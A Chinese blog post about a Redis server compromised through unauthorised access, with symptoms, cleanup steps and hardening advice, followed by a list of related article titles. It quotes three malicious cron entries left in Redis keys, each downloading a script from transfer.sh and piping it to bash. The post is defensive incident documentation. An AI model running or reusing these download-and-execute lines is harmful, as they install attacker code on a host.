redis服务器遭攻击,症状:
1. redis中的缓存数据每10分钟全部被清;
2. 许多目录下多了root文件和一堆隐藏文件; 
3. redis多了三个Key:Backup1、Backup2、Backup3;
key值对应的内容如下:
Backup1: */2 * * * * curl -shttps://transfer.sh/GoZkF/tmp.DoRh9YAdFi > .cmd && bash .cmd
Backup2: */5 * * * * wget -O .cmd https://transfer.sh/GoZkF/tmp.DoRh9YAdFi&& bash .cmd
Backup3: */10 * * * * lynx -sourcehttps://transfer.sh/15TRyl/tmp.pCnR6is0Gm > .cmd && bash .cmd

应对措施:
1. 在非root用户下重新安装redis,对特定IP开放端口,如果只是本机使用,绑定127.0.0.1:6379 ,增加密码;
2. 清除定时任务;
3. 杀掉进程、删除木马文件;
预防措施:
1. 禁止Redis服务对公网开放,可通过修改redis.conf配置文件中的"#bind 127.0.0.1" ,去掉前面的"#"即可(Redis本来就是作为内存数据库,只要监听在本机即可);
2. 设置密码访问认证,可通过修改redis.conf配置文件中的"requirepass" 设置复杂密码 (需要重启Redis服务才能生效);
3. 对访问源IP进行访问控制,可在防火墙限定指定源ip才可以连接Redis服务器;
4. 修改Redis默认端口,将默认的6379端口修改为其他端口;
5. 禁用config指令避免恶意操作,在Redis配置文件redis.conf中配置rename-command项"RENAME_CONFIG",这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度;
6. Redis使用普通用户权限,禁止使用 root 权限启动Redis 服务,这样可以保证在存在漏洞的情况下攻击者也只能获取到普通用户权限,无法获取root权限;

参考文档:
1. http://bbs.qcloud.com/thread-30706-1-1.html

redis漏洞防攻击相关推荐

  1. 【实战记录】记录服务器遭到攻击全过程(Redis漏洞)

    目录 概述 事件全流程叙述 本次解决方案总结 根本原因:Redis漏洞 止损方案 预防方案 主要原因:自身因素 总结 概述 在原本的做项目过程中,更加注重于项目功能的实现.而忽略了一个很重要的东西-- ...

  2. redis 漏洞利用与防御

    前言 ​ Redis在大公司被大量应用,通过笔者的研究发现,目前在互联网上已经出现Redis未经授权病毒似自动攻击,攻击成功后会对内网进行扫描.控制.感染以及用来进行挖矿.勒索等恶意行为,早期网上曾经 ...

  3. 小心Redis漏洞让你服务器沦为肉鸡

    小心Redis漏洞让你服务器沦为肉鸡 2016-06-23 龙果 前言 朋友的一个项目接到云服务器的告警,提示服务器已沦为肉鸡,网络带宽被大量占用,网站访问很慢,通过SSH终端远程管理服务器也频繁断开 ...

  4. 抵御风险网站防攻击,国产浏览器能做的有很多

    近几年,勒索软件攻击事件越来越多,教育和零售业.医疗保健机构.政府机构都成为攻击的受害方,勒索赎金常常高达数百万,严重影响机构的正常运营.勒索病毒一般通过程序木马.邮件.网站挂马等方式进行攻击,而浏览 ...

  5. 常见网络攻击方式介绍及短信防攻击策略的后端实现

    大家好,今天给大家分享一下:几种常见的网络攻击方式的介绍以及短信防攻击策略的后端实现. 一.背景介绍 有人的地方就有江湖,有数据交互的地方,就存在入侵风险. 只有知己知彼,才能百战不殆.我们学习相关知 ...

  6. redis漏洞利用总结

    前言 redis属于非关系型数据库,在开启后默认监听端口为6379.若Redis配置不当可导致攻击者直接获取到服务器的权限. 利用条件:redis以root身份运行,存在未授权访问,弱口令或者口令泄露 ...

  7. python dos攻击_利用SMB漏洞DoS攻击任何Windows系统

    原标题:利用SMB漏洞DoS攻击任何Windows系统 近日微软报出SMB V1存在漏洞,安全研究员并将此漏洞称作 " SMBLoris ",解释其能够发动拒绝服务(Dos)攻击, ...

  8. php进攻教程,如何对PHP程序中的常见漏洞进行攻击(下)_php基

    如何对PHP程序中的常见漏洞进行攻击(下)_php基 发布时间:2016-06-17 来源: 点击: 次 如何对PHP程序中的常见漏洞进行攻击(下) 翻译:analysist(分析家) 来源:http ...

  9. XSS漏洞自动化攻击工具XSSer

    XSS漏洞自动化攻击工具XSSer XSS是Web应用常见的漏洞.利用该漏洞,安全人员在网站注入恶意脚本,控制用户浏览器,并发起其他渗透操作.XSSer是Kali Linux提供的一款自动化XSS攻击 ...

最新文章

  1. GridView的DataKeyNames属性 转载的
  2. linux运行多个c文件路径,linux c的连接库和怎么同时编译多个源程序
  3. 关于Tomcat 的一些配置和启动
  4. Array.prototype.slice Array.prototype.splice 用法阐述
  5. 基于springBoot的旅游管理系统w010
  6. 父子进程与fork函数
  7. vscode插件离线下载vsix文件
  8. Liunx使用apt安装本地deb软件包
  9. Java 8 stream的使用示例
  10. dell服务器新bois系统设置u盘启动,跟大家讲讲dell新版biosU盘启动顺序
  11. 华为普工一个月的工资是多少?
  12. Pip修改阿里云镜像
  13. PaddleNLP_基于seq2seq的对联生成
  14. CrawlSpider实现微信小程序社区爬虫【python爬虫入门进阶】(18)
  15. 独立产品灵感周刊 DecoHack #022 - 截图应用如何在一个月收入 8000 美元
  16. [Cocos Creator] 本地文件加载系列六:本地龙骨动画dragonbones加载(web模式)
  17. Python库pillow(PIL)的使用
  18. Smith(史密斯)数的求法
  19. 周易六十四卦——豫卦
  20. 【SEO优化】什么是长尾关键词?

热门文章

  1. 给你一个网站,你如何来做自动化测试的?Web网站测试流程及方法
  2. css 缩放比例缩放,CSS实现宽高成比例缩放
  3. python中绝对值的三种求法
  4. 在线软件测试平台,免费好用的APP安全在线检测平台
  5. ElasticSearch7.3学习(二十一)----Filter与Query对比、使用explain关键字分析语法
  6. AKH-L零序电流互感器(安科瑞-卓宋兰)
  7. C语言电话号码查询系统[2023-01-16]
  8. 关于字体适配的那些事
  9. 盲签名(Blind Signature)及 RSA 盲签名
  10. 分享回顾|新岁序开,2023 和Jina AI共同码梦!